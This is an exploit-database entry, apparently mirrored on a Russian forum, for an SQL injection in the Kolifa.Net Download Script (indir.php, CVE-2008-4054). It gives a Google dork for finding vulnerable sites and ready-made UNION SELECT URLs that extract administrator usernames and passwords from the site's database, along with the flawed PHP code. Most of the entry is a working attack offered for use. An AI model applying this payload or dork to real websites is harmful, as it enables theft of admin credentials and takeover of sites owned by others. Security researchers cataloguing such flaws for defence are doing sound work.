- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6310
- Проверка EDB
-
- Пройдено
- Автор
- KACAK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4054
- Дата публикации
- 2008-08-26
Код:
Title: Kolifa.Net Download Script (indir.php)
================================================================
[+] Author : Kacak
[+] Special Thankz : Sa0 & Knock0ut & Biyocanlar & BilisimCanlar & All My Friends
[+] BuqX [at] Hotmail [dot] Com
[+] http://www.lmfrf.org/kolifanet-download-script-12-sql-injection-vulnerability/2008/08/26/web-script-bug/
=================================================================
Script : Kolifa.Net Download Script
Demo : http://kolifadwn.awardspace.com/down
Download : http://php.arsivimiz.com/indir.php?id=880
Google Dork : inurl:prog.php?dwkodu=
Error Code :
<?php
//*****************************
//*****************************
//********** KOLÄ°FA ***********
//********** DOWNLOAD *********
//********** SCRÄ°PT ***********
//*****************************
//****** www.kolifa.net *******
//*****************************
ini_set('error_reporting', E_ALL^E_NOTICE);
include("ayarlar.php");
require('fonksiyon.php');
$baglanti = mysql_connect($dbhost,$dbkullanici,$dbsifre) or die("Veritabanına bağlanılamadı.");
$sec = mysql_select_db($db);
$dwkodu=strip_tags($_GET['id']);
$act=strip_tags($_GET['act']);
?>
---------------------------
Example : http://[Site]/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/
[<p>Eğer Yüklenme İşlemi Başlamazsa <a href="Username:Password">Buraya Tıklayın</a></td>]
###############################################################
< -- bug code start -- >
www.site.com/path/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/*
/path/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/*
< -- bug code end of -- >
# milw0rm.com [2008-08-26]
- Источник
- www.exploit-db.com